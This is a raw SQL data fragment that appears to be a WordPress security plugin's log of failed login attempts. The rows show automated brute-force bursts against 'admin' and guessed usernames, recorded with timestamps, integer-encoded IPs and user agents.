(100612, 1496125087.725602, 1, 'loginFailInvalidUsername', 'venez', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100611, 1496125083.405617, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100610, 1496125080.794971, 1, 'loginFailInvalidUsername', 'cross', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100609, 1496125077.688888, 1, 'loginFailInvalidUsername', 'pour', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100608, 1496125073.633974, 1, 'loginFailInvalidUsername', 'notre', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100607, 1496125070.106179, 1, 'loginFailInvalidUsername', 'training', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100606, 1496125067.574683, 1, 'loginFailInvalidUsername', 'vous', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100605, 1496125064.327674, 1, 'loginFailValidUsername', 'pablo', 3, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100604, 1496125061.128359, 1, 'loginFailValidUsername', 'julie', 2, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100603, 1496125058.541949, 1, 'loginFailValidUsername', 'admin', 1, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100602, 1496116531.012500, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100601, 1496116530.697078, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100600, 1496116530.388610, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100599, 1496116530.069227, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100598, 1496116529.758272, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100597, 1496116529.447771, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100596, 1496116529.138821, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100595, 1496116528.826888, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100594, 1496116528.517273, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100593, 1496116528.208393, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100592, 1496116527.898955, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100591, 1496116527.585318, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100590, 1496116527.275569, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100589, 1496116526.961246, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100588, 1496116526.651248, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100587, 1496116526.330003, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100586, 1496116526.021421, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100585, 1496116525.712397, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100584, 1496116525.347731, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100583, 1496087364.255745, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100582, 1496087363.947303, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100581, 1496087363.637986, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100580, 1496087363.327778, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100579, 1496087363.017670, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100578, 1496087362.709613, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100577, 1496087362.400726, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100576, 1496087362.092075, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100575, 1496087361.780592, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100574, 1496087361.469172, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100573, 1496087361.155119, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100572, 1496087360.842256, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100571, 1496087360.528953, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100570, 1496087360.219965, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100569, 1496087359.908039, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100568, 1496087359.551049, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100567, 1496087359.236442, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100566, 1496087358.927704, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100564, 1496016405.395154, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100565, 1496087358.584144, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100562, 1496016404.997894, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100563, 1496016405.084761, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100560, 1496016404.693396, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100561, 1496016404.770173, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100558, 1496016404.458224, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100559, 1496016404.685631, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100556, 1496016404.374847, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100557, 1496016404.383853, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100554, 1496016404.149709, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100555, 1496016404.374245, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100552, 1496016404.066835, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100553, 1496016404.074477, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100550, 1496016404.065397, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100551, 1496016404.065589, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100548, 1496016403.760200, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100549, 1496016403.838880, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100546, 1496016403.750492, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100547, 1496016403.757606, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100544, 1496016403.529836, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100545, 1496016403.747813, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100542, 1496016403.432626, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100543, 1496016403.436577, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100540, 1496016403.428169, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100541, 1496016403.428717, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100538, 1496016403.128576, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100539, 1496016403.218667, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100536, 1496016403.117489, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100537, 1496016403.122014, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100534, 1496016402.902464, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100535, 1496016403.117732, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100532, 1496016402.775654, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100533, 1496016402.813926, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100530, 1496016402.754682, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100531, 1496016402.767692, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100528, 1496016402.505369, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100529, 1496016402.593704, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100526, 1496016402.454334, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100527, 1496016402.463289, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100524, 1496016402.284892, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100525, 1496016402.446867, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100522, 1496016402.155409, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100523, 1496016402.194208, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100520, 1496016402.138198, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100521, 1496016402.145432, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100518, 1496016401.875938, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100519, 1496016401.975821, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100516, 1496016401.836254, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100517, 1496016401.846428, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100514, 1496016401.666978, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100515, 1496016401.829537, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100512, 1496016401.537333, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100513, 1496016401.562412, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100510, 1496016401.519704, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100511, 1496016401.527826, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100508, 1496016401.236553, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100509, 1496016401.354928, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100506, 1496016401.216912, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100507, 1496016401.228306, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100504, 1496016401.045579, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100505, 1496016401.210446, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100502, 1496016400.918361, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100503, 1496016400.926889, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100500, 1496016400.899587, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100501, 1496016400.907911, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100498, 1496016400.613074, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100499, 1496016400.617509, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100496, 1496016400.594671, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100497, 1496016400.604947, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100494, 1496016400.303248, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100495, 1496016400.588339, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100492, 1496016400.290370, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100493, 1496016400.293794, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100490, 1496016400.276140, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100491, 1496016400.281565, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100488, 1496016399.973968, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100489, 1496016399.984421, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100486, 1496016399.969859, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100487, 1496016399.971270, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100484, 1496016399.673952, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100485, 1496016399.963848, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100482, 1496016399.661249, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100483, 1496016399.663588, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100480, 1496016399.651304, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100481, 1496016399.659493, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100478, 1496016399.333732, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100479, 1496016399.339898, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100476, 1496016399.333157, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100477, 1496016399.333422, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100474, 1496016399.007032, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100475, 1496016399.311909, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100472, 1496016399.005448, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100473, 1496016399.005523, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100470, 1496016399.001310, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100471, 1496016399.005254, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100468, 1496016398.624329, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100469, 1496016398.625248, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100466, 1496016398.617469, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100467, 1496016398.624318, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100464, 1496016398.285061, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100465, 1496016398.604779, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100463, 1496016398.265423, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100461, 1496016398.263811, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100462, 1496016398.264197, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100460, 1496015193.604173, 1, 'loginFailInvalidUsername', 'outils', 0, 2032732065, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100459, 1496014517.229718, 1, 'loginFailInvalidUsername', 'notre', 0, 700515628, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100458, 1496014267.226688, 1, 'loginFailInvalidUsername', 'outils', 0, 3586257058, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100457, 1496012986.492475, 1, 'loginFailValidUsername', 'admin', 1, 2032732065, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100456, 1496005374.293655, 1, 'loginFailInvalidUsername', 'wpupdatestream', 0, 1539837019, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_34_87; rv:45.75.28) Gecko/20130448 Firefox/45.75.28'),
(100455, 1495985527.741954, 1, 'loginFailValidUsername', 'admin', 1, 781668949, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100454, 1495979518.691432, 1, 'loginFailValidUsername', 'admin', 1, 529854975, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100453, 1495977625.050078, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1046956164, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100452, 1495976311.694372, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1489572659, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100451, 1495975788.074677, 1, 'loginFailInvalidUsername', '{login}', 0, 1501163646, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100450, 1495973935.874243, 1, 'loginFailValidUsername', 'admin', 1, 786077451, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100449, 1495971977.145649, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3397466494, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100448, 1495970056.012755, 1, 'loginFailInvalidUsername', '{login}', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100447, 1495968066.229732, 1, 'loginFailValidUsername', 'admin', 1, 1342920287, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100446, 1495966069.598939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 48857242, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100445, 1495964906.730744, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100444, 1495964906.419404, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100443, 1495964906.110184, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100442, 1495964905.798287, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100441, 1495964905.487291, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100440, 1495964905.177943, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100439, 1495964904.868015, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100438, 1495964904.557970, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100437, 1495964904.246010, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100436, 1495964903.936379, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100435, 1495964903.586192, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100434, 1495964903.277795, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100433, 1495964902.968805, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100432, 1495964902.659475, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100431, 1495964902.349846, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100430, 1495964901.984736, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100429, 1495964901.674331, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100428, 1495964901.361866, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100427, 1495964901.050263, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100426, 1495961949.028136, 1, 'loginFailValidUsername', 'admin', 1, 1835211794, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100425, 1495957823.960962, 1, 'loginFailInvalidUsername', '{login}', 0, 3254658395, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100424, 1495951743.211253, 1, 'loginFailInvalidUsername', '{login}', 0, 3254658598, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100423, 1495949720.840608, 1, 'loginFailValidUsername', 'admin', 1, 1563679021, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100422, 1495945376.902414, 1, 'loginFailInvalidUsername', '{login}', 0, 1424919935, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100421, 1495941420.345479, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3001689384, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100420, 1495937167.795845, 1, 'loginFailValidUsername', 'admin', 1, 3415091724, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100419, 1495935071.006533, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3362989667, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100418, 1495932996.313646, 1, 'loginFailInvalidUsername', '{login}', 0, 3415089988, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100417, 1495930830.070099, 1, 'loginFailValidUsername', 'admin', 1, 3254658399, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100416, 1495928647.357970, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 529853472, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100415, 1495924494.243243, 1, 'loginFailValidUsername', 'admin', 1, 3152885982, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100414, 1495918391.135351, 1, 'loginFailValidUsername', 'admin', 1, 3254658403, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100413, 1495914378.057410, 1, 'loginFailInvalidUsername', '{login}', 0, 3387838170, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100412, 1495912251.669653, 1, 'loginFailValidUsername', 'admin', 1, 3151105913, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100411, 1495911578.419575, 1, 'loginFailInvalidUsername', 'notre', 0, 1729627112, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100410, 1495911249.272302, 1, 'loginFailInvalidUsername', 'outils', 0, 3168080791, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100409, 1495910916.993120, 1, 'loginFailValidUsername', 'admin', 1, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100408, 1495910371.904239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1563679021, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
